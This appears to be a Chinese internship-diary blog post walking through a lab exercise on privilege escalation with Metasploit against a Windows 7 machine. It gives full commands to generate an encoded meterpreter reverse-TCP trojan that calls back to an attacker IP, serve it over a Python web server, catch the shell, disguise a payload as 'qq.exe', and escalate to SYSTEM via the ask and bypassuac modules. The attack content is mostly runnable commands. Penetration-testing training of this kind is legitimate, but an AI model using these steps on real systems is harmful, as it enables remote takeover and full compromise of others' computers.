zoukankan      html  css  js  c++  java
  • 粤嵌科技毕业实习Day17

    粤嵌科技毕业实习Day17

    提权

    1. 检查网络

    2. kali执行以下代码,生成一个远程控制木马msf.exe。

      msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp lhost=192.168.220.128 lport=4444 -b "x00" -e x86/shikata_ga_nai -i 10 -f exe >msf.exe
      #修改lhost(攻击机)和lport
      

    3. kali开启服务器

      python -m SimpleHTTPServer 800
      

    4. 进入msf框架进行配置并执行攻击指令开始监听。

      msfconsole
      use exploit/multi/handler
      set payload windows/meterpreter/reverse_tcp
      set lhost 192.168.220.128  #攻击机
      run
      

    5. win7访问恶意链接192.168.220.128:800下载软件

    6. win7运行msf.exe,kali反弹成功

    7. kali执行getuid指令,可以获取当前用户的信息,可知是普通管理员权限,还需要进一步提权。

      getuid
      background #从 meterpreter 退出到MSF框架
      

    方法一:提高程序运行级别提权

    1. kali使用use进入模块,配置session信息。

      use exploit/windows/local/ask
      info #查看需要修改的参数
      sessions
      set session 1 #使用没有系统权限的session1
      

    2. kali将文件名重命名为qq.exe进行伪装,并执行攻击指令。

      set filename qq.exe
      run
      

    3. win7弹出窗口,点击是。

    4. kali使用getsystem指令提权,前后对比。

      getuid
      getsystem
      getuid
      #用户为NT AUTHORITYSYSTEM ,这个也就是Windows的系统权限。
      background
      

    方法二:bypassuac提权

    1. kali使用use进入模块并执行攻击指令。

      use exploit/windows/local/bypassuac
      info
      sessions
      set session 1 #使用没有系统权限的session1
      run
      

    2. kali使用getsystem指令提权,前后对比。

      getuid
      getsystem
      getuid
      #用户为NT AUTHORITYSYSTEM ,这个也就是Windows的系统权限。
      

    本文作者:AlubNoBug
    本文链接:https://www.cnblogs.com/AlubNoBug/p/13696547.html

  • 相关阅读:
    4.文本编辑器vi的简单实用与指针介绍
    3.理解make命令——编译源文件安装
    2.换一种方式理解linux命令行
    1.linux环境搭建
    Tomcat 何时解压war包
    正则表达式8---再谈小括号
    利用vue-resource模拟百度下拉列表
    那些年iframe的坑(一)
    $nextTick()的理解
    一个超简单的vue商品计算总金额
  • 原文地址:https://www.cnblogs.com/AlubNoBug/p/13696547.html
Copyright © 2011-2022 走看看